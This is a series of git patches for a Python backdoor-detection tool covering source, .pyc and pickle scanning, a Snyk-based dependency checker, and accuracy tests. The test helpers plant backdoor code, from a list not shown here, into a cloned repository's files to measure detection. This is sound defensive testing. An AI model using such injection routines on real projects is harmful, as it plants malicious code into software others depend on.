GPTdetectedNum = 0 - - for i in possibly_dangerous_file: - content = read_file_content(str(i)) - results = {} - try: - results = detectGPT(content) - if ( - len(results["high"]) > 0 - or len(results["medium"]) > 0 - or len(results["low"]) > 0 - ): - GPTdetectedNum += 1 - print(GPTdetectedNum) - self.assertGreaterEqual(GPTdetectedNum, detectedNum) - - except Exception as e: - print(e) + GPTresult = GPTdetectFileList(possibly_dangerous_file) + for result in GPTresult: + if len(result) > 0: + GPTdetectedNum += 1 + print(GPTdetectedNum) + self.assertGreaterEqual(GPTdetectedNum, detectedNum) # test pickle files pickle_detectedNum = 0 From 977841837decb7adb00dab3c99a9d2d81b677ffe Mon Sep 17 00:00:00 2001 From: dqy <1016751306@qq.com> Date: Tue, 4 Jun 2024 17:47:25 +0800 Subject: [PATCH 14/30] =?UTF-8?q?feat:=20=E9=BB=98=E8=AE=A4=E4=BB=8E?= =?UTF-8?q?=E7=B3=BB=E7=BB=9F=E5=8F=98=E9=87=8Fpycdc=E4=B8=AD=E8=AF=BB?= =?UTF-8?q?=E5=8F=96=E8=B7=AF=E5=BE=84?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/__main__.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/detection/__main__.py b/detection/__main__.py index 9881eb5..fffaf0a 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -420,7 +420,10 @@ def main(): "-m", "--mode", help="Mode of operation:[regex,llm]", default="regex" ) parser.add_argument( - "-p", "--pycdc", help="Path to pycdc.exe to decompile", default=None + "-p", + "--pycdc", + help="Path to pycdc.exe to decompile", + default=os.getenv("pycdc"), ) args = parser.parse_args() output_format = "txt" # Default output format From 6e1c0e5ae6d9be2751c96a2138a9386c7e57d824 Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Tue, 4 Jun 2024 18:11:14 +0800 Subject: [PATCH 15/30] feat: update test case --- tests/final_tests_util.py | 22 +++++-------- tests/test_final_tests.py | 66 +++++++++++++++++++++++++++++---------- 2 files changed, 56 insertions(+), 32 deletions(-) diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index d4647bf..a07e2fc 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -3,9 +3,8 @@ from git import Repo # type: ignore import random from pathlib import Path import pickle -import marshal -import importlib.util import os +import py_compile def clone_repo(repo_url: str, clone_dir: str) -> None: @@ -175,20 +174,13 @@ def inject_pyc_backdoor(root_path: str) -> None: for path in paths: backdoor_id = random.randrange(0, len(backdoors)) backdoor = backdoors[backdoor_id] - filename = os.path.join(path, f"backdoor{backdoor_id}.pyc") + py_filename = os.path.join(path, f"backdoor{backdoor_id}.py") + pyc_filename = os.path.join(path, f"backdoor{backdoor_id}.pyc") + with open(py_filename, "w") as f: + f.write(backdoor) - # Compile the string to a code object - code = compile(backdoor, filename, "exec") - - # Create a code object header - header = importlib.util.MAGIC_NUMBER - if hasattr(importlib.util, "SOURCE_SUFFIXES"): - header += b"\x00" * 4 - - # Write the .pyc file - with open(filename, "wb") as file: - file.write(header) - marshal.dump(code, file) + py_compile.compile(py_filename, cfile=pyc_filename) + os.remove(py_filename) if __name__ == "__main__": diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py index e7bbcb1..f92fb81 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -1,5 +1,6 @@ import unittest import shutil +import os from detection.utils import read_file_content from .final_tests_util import clone_repo, Path, inject_random_backdoor @@ -9,21 +10,34 @@ from detection.GPTdetection import detectGPT class TestFinalTests(unittest.TestCase): def setUp(self) -> None: - self.path = "./tmp/repo" + self.path = "./tmp/repo/" shutil.rmtree(self.path, ignore_errors=True) - clone_repo("https://github.com/injetlee/Python.git", self.path) + if not os.path.exists("/tmp/Python/"): + clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python") + shutil.copytree("/tmp/Python", self.path) sampleRate = 0.1 - self.inject_reslt = inject_random_backdoor(self.path, sample_rate=sampleRate) - self.injectedNum = len(self.inject_reslt) + self.inject_result = inject_random_backdoor( + self.path, sample_rate=sampleRate, pyc=True, pickle=True + ) + self.injectedNum = len(self.inject_result) print(self.injectedNum) project_path = Path(self.path) + self.all_python_files = list(project_path.rglob("*.py")) self.py_filesNum = len(self.all_python_files) - self.trueRate = self.injectedNum / self.py_filesNum - print(self.trueRate) - # test backdoor code in python files + all_pickle_files = list(project_path.rglob("*.pickle")) + self.pickle_filesNum = len(all_pickle_files) + + all_pyc_files = list(project_path.rglob("*.pyc")) + self.pyc_filesNum = len(all_pyc_files) + + os.system( + "python -m detection " + self.path + " -o " + self.path + "output.txt" + ) + def test_final_tests_pycode(self): + # test backdoor code in python files detectedNum = 0 possibly_dangerous_file = [] for file in self.all_python_files: @@ -37,7 +51,6 @@ class TestFinalTests(unittest.TestCase): detectedNum += 1 possibly_dangerous_file.append(file) print(detectedNum / self.py_filesNum) - self.assertAlmostEqual(detectedNum, self.py_filesNum, places=1) GPTdetectedNum = 0 for i in possibly_dangerous_file: @@ -52,21 +65,40 @@ class TestFinalTests(unittest.TestCase): ): GPTdetectedNum += 1 print(GPTdetectedNum) - self.assertGreaterEqual(GPTdetectedNum, detectedNum) except Exception as e: - print(e) + # print(e) + pass + + # test injected code + with open(self.path + "output.txt", "r") as f: + lines = f.readlines() + injected_detectedNum = 0 + for line in lines: + if "py:" in line: + injected_detectedNum += 1 + injected_accurency = injected_detectedNum / self.injectedNum + print(f"injected files accurency: {injected_accurency}") # test pickle files - pickle_detectedNum = 0 - pickle_tureNum = len(list(Path(self.path).glob("*.pickle"))) - - self.assertAlmostEqual(pickle_detectedNum, pickle_tureNum, places=1) + with open(self.path + "output.txt", "r") as f: + lines = f.readlines() + pickle_detectedNum = 0 + for line in lines: + if "pickle" in line: + pickle_detectedNum += 1 + pickle_accurency = pickle_detectedNum / self.pickle_filesNum + print(f"pickle files accurency: {pickle_accurency}") # test pyc files - pyc_detectedNum = 0 - pyc_tureNum = len(list(Path(self.path).glob("*.pyc"))) - self.assertAlmostEqual(pyc_detectedNum, pyc_tureNum, places=1) + with open(self.path + "output.txt", "r") as f: + lines = f.readlines() + pyc_detectedNum = 0 + for line in lines: + if "pyc" in line: + pyc_detectedNum += 1 + pyc_accurency = pyc_detectedNum / self.pyc_filesNum + print(f"pyc files accurency: {pyc_accurency}") if __name__ == "__main__": From fd4ecce710a0dc24a01dc78715e648d00ceeb014 Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Tue, 4 Jun 2024 19:27:56 +0800 Subject: [PATCH 16/30] fix: fix some error --- tests/final_tests_util.py | 10 +++------ tests/test_final_tests.py | 44 +++++++++++++++++++++++++-------------- 2 files changed, 31 insertions(+), 23 deletions(-) diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index a07e2fc..58715cc 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -25,7 +25,7 @@ def clone_repo(repo_url: str, clone_dir: str) -> None: def inject_random_backdoor( - path: str, pickle: bool = False, pyc: bool = False, sample_rate: float = 0.1 + path: str, sample_rate: float = 0.1 ) -> Tuple[Tuple[str, int], ...]: """ Insert random backdoor into the path. @@ -35,11 +35,6 @@ def inject_random_backdoor( pickle (bool): Whether to insert a backdoor into a pickle file. pyc (bool): Whether to insert a backdoor into a compiled Python file. """ - if pickle: - inject_pickle_backdoor(path) - if pyc: - inject_pyc_backdoor(path) - project_path = Path(path) all_python_files = list(project_path.rglob("*.py")) injected_python_files = [] @@ -187,4 +182,5 @@ if __name__ == "__main__": repo_url = "https://github.com/TheAlgorithms/Python.git" clone_dir = "/tmp/repo" clone_repo(repo_url, clone_dir) - inject_random_backdoor(clone_dir, pickle=True, pyc=True) + inject_random_backdoor(clone_dir) + inject_pickle_backdoor(clone_dir) diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py index f3acc56..7adad0c 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -5,7 +5,13 @@ import os import threading from detection.utils import read_file_content -from .final_tests_util import clone_repo, Path, inject_random_backdoor +from .final_tests_util import ( + clone_repo, + Path, + inject_pickle_backdoor, + inject_random_backdoor, + inject_pyc_backdoor, +) from detection.Regexdetection import find_dangerous_functions from detection.GPTdetection import detectGPT @@ -23,12 +29,14 @@ def GPTdetectFileList(fileList): thread.join() return results + def GPTThread(content, results): try: results.append(detectGPT(content)) except Exception as e: print(e) + class TestFinalTests(unittest.TestCase): def setUp(self) -> None: self.path = "./tmp/repo/" @@ -37,21 +45,21 @@ class TestFinalTests(unittest.TestCase): clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python") shutil.copytree("/tmp/Python", self.path) sampleRate = 0.1 - self.inject_result = inject_random_backdoor( - self.path, sample_rate=sampleRate, pyc=True, pickle=True - ) + self.inject_result = inject_random_backdoor(self.path, sample_rate=sampleRate) + self.pickle_true_num = inject_pickle_backdoor(self.path) + self.pyc_true_num = inject_pyc_backdoor(self.path) self.injectedNum = len(self.inject_result) print(self.injectedNum) project_path = Path(self.path) self.all_python_files = list(project_path.rglob("*.py")) - self.py_filesNum = len(self.all_python_files) + self.py_files_num = len(self.all_python_files) all_pickle_files = list(project_path.rglob("*.pickle")) - self.pickle_filesNum = len(all_pickle_files) + self.pickle_files_num = len(all_pickle_files) all_pyc_files = list(project_path.rglob("*.pyc")) - self.pyc_filesNum = len(all_pyc_files) + self.pyc_files_num = len(all_pyc_files) os.system( "python -m detection " + self.path + " -o " + self.path + "output.txt" @@ -71,7 +79,7 @@ class TestFinalTests(unittest.TestCase): ): detectedNum += 1 possibly_dangerous_file.append(file) - print(detectedNum / self.py_filesNum) + print(detectedNum / self.py_files_num) GPTdetectedNum = 0 for i in possibly_dangerous_file: @@ -100,12 +108,16 @@ class TestFinalTests(unittest.TestCase): injected_detectedNum += 1 injected_accurency = injected_detectedNum / self.injectedNum print(f"injected files accurency: {injected_accurency}") - GPTresult = GPTdetectFileList(possibly_dangerous_file) - for result in GPTresult: - if len(result) > 0: - GPTdetectedNum += 1 - print(GPTdetectedNum) - self.assertGreaterEqual(GPTdetectedNum, detectedNum) + try: + GPTresult = GPTdetectFileList(possibly_dangerous_file) + for result in GPTresult: + if len(result) > 0: + GPTdetectedNum += 1 + print(GPTdetectedNum) + self.assertGreaterEqual(GPTdetectedNum, detectedNum) + except Exception as e: + # print(e) + pass # test pickle files with open(self.path + "output.txt", "r") as f: @@ -114,7 +126,7 @@ class TestFinalTests(unittest.TestCase): for line in lines: if "pickle" in line: pickle_detectedNum += 1 - pickle_accurency = pickle_detectedNum / self.pickle_filesNum + pickle_accurency = pickle_detectedNum / self.pickle_files_num print(f"pickle files accurency: {pickle_accurency}") # test pyc files @@ -124,7 +136,7 @@ class TestFinalTests(unittest.TestCase): for line in lines: if "pyc" in line: pyc_detectedNum += 1 - pyc_accurency = pyc_detectedNum / self.pyc_filesNum + pyc_accurency = pyc_detectedNum / self.pyc_files_num print(f"pyc files accurency: {pyc_accurency}") From 0f2fb3c9255c87b231e2b7a3071770ec1008b9cf Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Tue, 4 Jun 2024 19:35:42 +0800 Subject: [PATCH 17/30] =?UTF-8?q?feat=EF=BC=9A=E6=B7=BB=E5=8A=A0pickle?= =?UTF-8?q?=E6=89=AB=E6=8F=8F=E5=85=A5=E5=8F=A3?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/__main__.py | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/detection/__main__.py b/detection/__main__.py index fffaf0a..b19b53d 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -3,6 +3,8 @@ from typing import Dict, List, Tuple, Optional from reportlab.lib.pagesizes import letter from reportlab.lib.styles import getSampleStyleSheet from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate + +from detection.pickle_detection import pickleDataDetection from .Regexdetection import find_dangerous_functions from .GPTdetection import detectGPT from .pyc_detection import disassemble_pyc @@ -425,9 +427,18 @@ def main(): help="Path to pycdc.exe to decompile", default=os.getenv("pycdc"), ) + parser.add_argument( + "-P", + "--Pickle", + help="Path to pickle file to analyze", + default=None, + ) args = parser.parse_args() output_format = "txt" # Default output format output_file = None + if args.Pickle: + pickleDataDetection(args.Pickle, args.output) + return if args.output: _, ext = os.path.splitext(args.output) ext = ext.lower() From ec30999d2c54aa0f64d95857f41d9e62ef3a86db Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Tue, 4 Jun 2024 19:50:31 +0800 Subject: [PATCH 18/30] =?UTF-8?q?fix:=E4=BF=AE=E6=94=B9pickle=E6=89=AB?= =?UTF-8?q?=E6=8F=8F=E6=96=B9=E6=B3=95=20=E4=B8=8E=E5=85=B6=E4=BB=96?= =?UTF-8?q?=E7=BB=9F=E4=B8=80?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/__main__.py | 15 ++++++++++++++- detection/pickle_detection.py | 6 +----- 2 files changed, 15 insertions(+), 6 deletions(-) diff --git a/detection/__main__.py b/detection/__main__.py index b19b53d..ef59a08 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -375,6 +375,13 @@ def process_path( # 扫描动画 for file_path in tqdm(all_files, desc="Scanning files", unit="file"): file_extension = file_path.suffix + if file_extension in [".pkl",".pickle"]: + res = pickleDataDetection(str(file_path), output_file) + results["pickles"].append({ + "file": str(file_path), + "result": res + }) + continue file_results = checkModeAndDetect( mode, str(file_path), file_extension, pycdc_addr ) @@ -389,7 +396,13 @@ def process_path( ) elif os.path.isfile(path): file_extension = os.path.splitext(path)[1] - if file_extension in SUPPORTED_EXTENSIONS: + if file_extension in [".pkl", ".pickle"]: + res = pickleDataDetection(str(path), output_file) + results["pickles"].append({ + "file": str(path), + "result": res + }) + elif file_extension in SUPPORTED_EXTENSIONS: file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr) if file_results is not None: for key in file_results: diff --git a/detection/pickle_detection.py b/detection/pickle_detection.py index cfbd258..c848b4c 100644 --- a/detection/pickle_detection.py +++ b/detection/pickle_detection.py @@ -142,11 +142,7 @@ def pickleDataDetection(filename: str, output_file=None): pickscan = pickleScanner(file) pickscan.load() res = pickscan.output() - if output_file: - with open(output_file, "w") as file: - json.dump(res, file, indent=4) - else: - print(json.dumps(res)) + return res if __name__ == "__main__": From 81cbc88e9befa7d2064fe2ed5b61eaadd371c676 Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Tue, 4 Jun 2024 20:31:09 +0800 Subject: [PATCH 19/30] feat: update accurency formula --- tests/test_final_tests.py | 38 +++++++++++++++++++++++++++++--------- 1 file changed, 29 insertions(+), 9 deletions(-) diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py index 7adad0c..caad14b 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -3,6 +3,7 @@ import unittest import shutil import os import threading +import re from detection.utils import read_file_content from .final_tests_util import ( @@ -11,6 +12,7 @@ from .final_tests_util import ( inject_pickle_backdoor, inject_random_backdoor, inject_pyc_backdoor, + backdoors, ) from detection.Regexdetection import find_dangerous_functions from detection.GPTdetection import detectGPT @@ -102,11 +104,22 @@ class TestFinalTests(unittest.TestCase): # test injected code with open(self.path + "output.txt", "r") as f: lines = f.readlines() - injected_detectedNum = 0 + injected_detected_num = 0 + injected_correct_num = 0 + pattern = r"\w+\.py: Line \d+: (.+)" for line in lines: if "py:" in line: - injected_detectedNum += 1 - injected_accurency = injected_detectedNum / self.injectedNum + injected_detected_num += 1 + match = re.search(pattern, line) + command = "" + if match: + command = match.group(1) + for backdoor in backdoors: + if command in backdoor: + injected_correct_num += 1 + break + + injected_accurency = injected_detected_num / self.py_files_num print(f"injected files accurency: {injected_accurency}") try: GPTresult = GPTdetectFileList(possibly_dangerous_file) @@ -122,21 +135,28 @@ class TestFinalTests(unittest.TestCase): # test pickle files with open(self.path + "output.txt", "r") as f: lines = f.readlines() - pickle_detectedNum = 0 + pickle_detected_num = 0 + pickle_correct_num = 0 for line in lines: if "pickle" in line: - pickle_detectedNum += 1 - pickle_accurency = pickle_detectedNum / self.pickle_files_num + pickle_detected_num += 1 + if re.search(r"backdoor\d*\.pickle", line): + pickle_correct_num += 1 + + pickle_accurency = pickle_detected_num / self.pickle_true_num print(f"pickle files accurency: {pickle_accurency}") # test pyc files with open(self.path + "output.txt", "r") as f: lines = f.readlines() - pyc_detectedNum = 0 + pyc_detected_num = 0 + pyc_correct_num = 0 for line in lines: if "pyc" in line: - pyc_detectedNum += 1 - pyc_accurency = pyc_detectedNum / self.pyc_files_num + pyc_detected_num += 1 + if re.search(r"backdoor\d*\.pyc", line): + pyc_correct_num += 1 + pyc_accurency = pyc_detected_num / self.pyc_true_num print(f"pyc files accurency: {pyc_accurency}") From cb30fddb1c6a6e8f8201ea1e1608356f811b429f Mon Sep 17 00:00:00 2001 From: dqy <1016751306@qq.com> Date: Tue, 4 Jun 2024 20:58:14 +0800 Subject: [PATCH 20/30] =?UTF-8?q?feat:=20=E4=BF=AE=E6=94=B9pycdc=E9=BB=98?= =?UTF-8?q?=E8=AE=A4=E8=B7=AF=E5=BE=84?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/__main__.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/detection/__main__.py b/detection/__main__.py index fffaf0a..e308085 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -423,7 +423,7 @@ def main(): "-p", "--pycdc", help="Path to pycdc.exe to decompile", - default=os.getenv("pycdc"), + default=os.getenv("PATH"), ) args = parser.parse_args() output_format = "txt" # Default output format From 843c9d7ba30390376420d56d729afaa6f923e3f5 Mon Sep 17 00:00:00 2001 From: dqy <1016751306@qq.com> Date: Tue, 4 Jun 2024 20:58:31 +0800 Subject: [PATCH 21/30] =?UTF-8?q?feat:=20=E4=BF=AE=E6=94=B9=E4=BE=9D?= =?UTF-8?q?=E8=B5=96=E6=A3=80=E6=B5=8B=E5=8A=9F=E8=83=BD?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/requirements_detection.py | 343 +++++++++------------------- 1 file changed, 102 insertions(+), 241 deletions(-) diff --git a/detection/requirements_detection.py b/detection/requirements_detection.py index 5404292..5a1c78f 100644 --- a/detection/requirements_detection.py +++ b/detection/requirements_detection.py @@ -1,239 +1,113 @@ -import re -import os -import requests import argparse +import requests from bs4 import BeautifulSoup -from typing import List, Tuple, Optional -from packaging import version -from packaging.specifiers import SpecifierSet -from reportlab.lib.pagesizes import letter -from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer -from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle +from packaging.version import Version, InvalidVersion +import sys -def fetch_html(url: str) -> Optional[str]: - """Fetch HTML content from the specified URL. - - Args: - url (str): URL to fetch HTML from. - - Returns: - Optional[str]: HTML content as a string, or None if fetch fails. - """ - response = requests.get(url) - if response.status_code == 200: +def fetch_html(url: str) -> str: + try: + response = requests.get(url) + response.raise_for_status() return response.text - return None + except requests.RequestException as e: + print(f"Error fetching {url}: {e}") + return "" -def parse_html(html: str) -> List[Tuple[str, List[str]]]: - """Parse HTML to get content of all 'a' and 'span' tags under the second 'td' of each 'tr'. - - Args: - html (str): HTML content as a string. - - Returns: - List[Tuple[str, List[str]]]: A list of tuples containing the text of 'a' tags and lists of 'span' texts. - """ +def parse_html(html: str) -> list: soup = BeautifulSoup(html, "html.parser") table = soup.find("table", id="sortable-table") + if not table: + return [] + + rows = table.find_all("tr", class_="vue--table__row") results = [] - if table: - rows = table.find("tbody").find_all("tr") - for row in rows: - tds = row.find_all("td") - if len(tds) >= 2: - a_tags = tds[1].find_all("a") - span_tags = tds[1].find_all("span") - spans = [span.text.strip() for span in span_tags] - for a_tag in a_tags: - results.append((a_tag.text.strip(), spans)) + for row in rows: + info = {} + link = row.find("a") + chip = row.find("span", class_="vue--chip__value") + if link and chip: + info["link"] = link.get_text(strip=True) + info["chip"] = chip.get_text(strip=True) + results.append(info) return results -def format_results(results: List[Tuple[str, List[str]]]) -> str: - """Format extracted data as a string. - - Args: - results (List[Tuple[str, List[str]]]): Extracted data to format. - - Returns: - str: Formatted string of the extracted data. - """ - formatted_result = "" - for package_name, version_ranges in results: - formatted_result += f"Package Name: {package_name}\n" - formatted_result += "Version Ranges: " + ", ".join(version_ranges) + "\n" - formatted_result += "-" * 50 + "\n" - return formatted_result - - -def trans_vulnerable_packages(content): - """将漏洞版本中的集合形式转换为大于小于的格式 - Args: - content (str): 漏洞版本汇总信息. - """ - vulnerabilities = {} - blocks = content.split("--------------------------------------------------") - range_pattern = re.compile(r"\[(.*?),\s*(.*?)\)") - - for block in blocks: - name_match = re.search(r"Package Name: (.+)", block) - if name_match: - package_name = name_match.group(1).strip() - ranges = range_pattern.findall(block) - specifier_list = [] - for start, end in ranges: - if start and end: - specifier_list.append(f">={start},<{end}") - elif start: - specifier_list.append(f">={start}") - elif end: - specifier_list.append(f"<{end}") - if specifier_list: - vulnerabilities[package_name] = SpecifierSet(",".join(specifier_list)) - return vulnerabilities - - -def format_vulnerabilities(vuln_packages): - """将字典形式的漏洞信息格式化 - Args: - vuln_packages (List[Tuple[str, List[str]]]): Extracted data to format. - """ - res = "" - for package, specifiers in vuln_packages.items(): - res += f"Package Name: {package}\n" - res += f"Version Ranges: {specifiers}\n" - res += "-" * 50 + "\n" - return res - - -def load_requirements(filename): - """从文件加载项目的依赖信息""" - with open(filename, "r", encoding="utf-8") as file: - lines = file.readlines() - requirements = {} - for line in lines: - if "==" in line: - package_name, package_version = line.strip().split("==") - requirements[package_name] = package_version +def load_requirements(file_path: str) -> list: + requirements = [] + try: + with open(file_path, "r") as file: + for line in file: + line = line.strip() + if line and not line.startswith("#"): + requirements.append(line) + except FileNotFoundError: + print(f"Error: File {file_path} not found.") + sys.exit(1) return requirements -def check_vulnerabilities(requirements, vulnerabilities, output_file): - """检查依赖项是否存在已知漏洞,并输出结果""" - results_warning = [] # 存储有漏洞的依赖 - results_ok = [] # 存储没有漏洞的依赖 - - for req_name, req_version in requirements.items(): - if req_name in vulnerabilities: - spec = vulnerabilities[req_name] - if version.parse(req_version) in spec: - results_warning.append( - f"WARNING: {req_name}=={req_version} is vulnerable!" - ) - else: - results_ok.append(f"OK: {req_name}=={req_version} is not affected.") - else: - results_ok.append( - f"OK: {req_name} not found in the vulnerability database." - ) - - # 合并结果,先输出所有警告,然后输出所有正常情况 - results = results_warning + results_ok - # print(results) - if output_file: - filename, ext = os.path.splitext(output_file) - output_format = ext[1:] if ext[1:] else "txt" - if output_format not in ["txt", "md", "html", "pdf"]: - print("Warning: Invalid file format specified. Defaulting to TXT format.") - output_format = "txt" # 确保使用默认格式 - output_file = filename + ".txt" - output_results(output_file, results, output_format) +def version_in_range(version, range_str: str) -> bool: + if version is not None: + try: + v = Version(version) + except InvalidVersion: + return False else: - print("\n".join(results)) + # 如果没有给版本号,默认使用最新版本 + if range_str[-2] == ",": + return True + + ranges = range_str.split(",") + for range_part in ranges: + range_part = range_part.strip("[]()") + if range_part: + try: + if range_part.endswith(")"): + upper = Version(range_part[:-1]) + if v >= upper: + return False + elif range_part.startswith("["): + lower = Version(range_part[1:]) + if v < lower: + return False + except InvalidVersion: + return False + return True -def trans_vulnerable_packages_to_dict(content): - """将漏洞信息转换为字典格式 - Args: - content str: 漏洞信息汇总. - """ - vulnerabilities = {} - blocks = content.split("--------------------------------------------------") - for block in blocks: - name_match = re.search(r"Package Name: (.+)", block) - range_match = re.search(r"Version Ranges: (.+)", block) - if name_match and range_match: - package_name = name_match.group(1).strip() - version_range = range_match.group(1).strip() - version_range = ",".join( - [part.strip() for part in version_range.split(",")] - ) - vulnerabilities[package_name] = SpecifierSet(version_range) - return vulnerabilities - - -def output_pdf(results, file_name): - doc = SimpleDocTemplate(file_name, pagesize=letter) - story = [] - styles = getSampleStyleSheet() - - # Custom styles - title_style = styles["Title"] - title_style.alignment = 1 # Center alignment - - warning_style = ParagraphStyle( - "WarningStyle", parent=styles["BodyText"], fontName="Helvetica-Bold" - ) - normal_style = styles["BodyText"] - - # Add the title - title = Paragraph("Vulnerability Report", title_style) - story.append(title) - story.append(Spacer(1, 20)) # Space after title - - # Iterate through results to add entries - for result in results: - if "WARNING:" in result: - # Add warning text in bold - entry = Paragraph( - result.replace("WARNING:", "WARNING:"), warning_style - ) - else: - # Add normal text - entry = Paragraph(result, normal_style) - - story.append(entry) - story.append(Spacer(1, 12)) # Space between entries - - doc.build(story) - - -def output_results(filename, results, format_type): - """根据指定的格式输出结果""" - output_dir = os.path.dirname(filename) - if not os.path.exists(output_dir): - os.makedirs(output_dir) - - with open(filename, "w", encoding="utf-8") as file: - if format_type == "html": - file.write("Vulnerability Report\n") - file.write("

Vulnerability Report

\n") - for result in results: - file.write(f"

{result}

\n") - file.write("") - elif format_type == "md": - file.write("# Vulnerability Report\n") - for result in results: - file.write(f"* {result}\n") - elif format_type == "pdf": - output_pdf(results, filename) - else: # 默认为txt - for result in results: - file.write(f"{result}\n") - - print("Results have been saved as " + filename) +def check_vulnerabilities(requirements: list, base_url: str, output_file: str): + with open(output_file, "w") as out_file: + for req in requirements: + version = "" + # 如果有版本 + if "==" in req: + package_name, version = req.split("==") + # 没有版本 + else: + package_name, version = req, None + # 拼接URL + url = f"{base_url}{package_name}" + print(f"Fetching data for {package_name} from {url}") + html_content = fetch_html(url) + if html_content: + # 解析hmtl + extracted_data = parse_html(html_content) + if extracted_data: + relevant_vulns = [] + for vuln in extracted_data: + if version_in_range(version, vuln["chip"]): + relevant_vulns.append(vuln) + if relevant_vulns: + out_file.write(f"Vulnerabilities found for {package_name}:\n") + for vuln in relevant_vulns: + out_file.write(f" - {vuln['link']}\n") + out_file.write("\n") + else: + print(f"No relevant data found for {package_name}.") + else: + print(f"Failed to fetch data for {package_name}.") def main(): @@ -241,38 +115,25 @@ def main(): description="Check project dependencies for vulnerabilities." ) parser.add_argument( - "requirements_file", help="Path to the requirements file of the project" + "-r", + "--requirement", + help="Path to the requirements file of the project", + required=True, ) parser.add_argument( "-o", "--output", help="Output file path with extension, e.g., './output/report.txt'", + required=True, ) args = parser.parse_args() - base_url = "https://security.snyk.io/vuln/pip/" - page_number = 1 - crawler_results = "" - while True: - url = f"{base_url}{page_number}" - print(f"Fetching data from {url}") - html_content = fetch_html(url) - if not html_content: - print("No more data found or failed to fetch.") - break - extracted_data = parse_html(html_content) - if not extracted_data: - print("No relevant data found on page.") - break - crawler_results += format_results(extracted_data) - page_number += 1 - print("Results have been stored in memory.\n") - - trans_res = trans_vulnerable_packages(crawler_results) - trans_res = format_vulnerabilities(trans_res) - trans_res = trans_vulnerable_packages_to_dict(trans_res) - requirements = load_requirements(args.requirements_file) - check_vulnerabilities(requirements, trans_res, args.output) + base_url = "https://security.snyk.io/package/pip/" + # 分析项目依赖,包括名称和版本(如果有的话) + requirements = load_requirements(args.requirement) + # 传入依赖信息,url前缀,扫描结果输出位置 + check_vulnerabilities(requirements, base_url, args.output) + print("Vulnerability scan complete. Results saved to", args.output) if __name__ == "__main__": From caeee4d179d986a3cf3e4302f64b380ecceda284 Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Tue, 4 Jun 2024 21:09:43 +0800 Subject: [PATCH 22/30] =?UTF-8?q?fix=EF=BC=9A=E4=BF=AE=E5=A4=8Dpickle?= =?UTF-8?q?=E7=BB=93=E6=9E=9C=E8=BE=93=E5=87=BA?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/__main__.py | 20 +++++++++----------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/detection/__main__.py b/detection/__main__.py index ef59a08..9586c4d 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -1,3 +1,4 @@ +import json import os from typing import Dict, List, Tuple, Optional from reportlab.lib.pagesizes import letter @@ -106,7 +107,11 @@ def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str: text_output += "=" * 30 + "\n\n" for risk_level, entries in results.items(): - if entries and risk_level != "none": + if risk_level == "pickles": + text_output += f"Pickles:\n" + for i in entries: + text_output += f" {i['file']}:{json.dumps(i['result'])}\n" + elif entries and risk_level != "none": risk_color = ( { "high": Fore.RED, @@ -139,6 +144,8 @@ def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str: text_output += line_text text_output += "\n" + + return text_output @@ -363,7 +370,7 @@ def checkModeAndDetect(mode: str, filePath: str, fileExtension: str, pycdc_addr: def process_path( path: str, output_format: str, mode: str, pycdc_addr: str, output_file=None ): - results = {"high": [], "medium": [], "low": [], "none": []} + results = {"high": [], "medium": [], "low": [], "none": [],"pickles": []} if os.path.isdir(path): # 使用rglob获取所有文件 all_files = [ @@ -440,18 +447,9 @@ def main(): help="Path to pycdc.exe to decompile", default=os.getenv("pycdc"), ) - parser.add_argument( - "-P", - "--Pickle", - help="Path to pickle file to analyze", - default=None, - ) args = parser.parse_args() output_format = "txt" # Default output format output_file = None - if args.Pickle: - pickleDataDetection(args.Pickle, args.output) - return if args.output: _, ext = os.path.splitext(args.output) ext = ext.lower() From a2651b499e78f3ccd6888e9c19e1678cdea8b83b Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Tue, 4 Jun 2024 21:44:42 +0800 Subject: [PATCH 23/30] chore: TODO preprocessing --- tests/test_final_tests.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/tests/test_final_tests.py 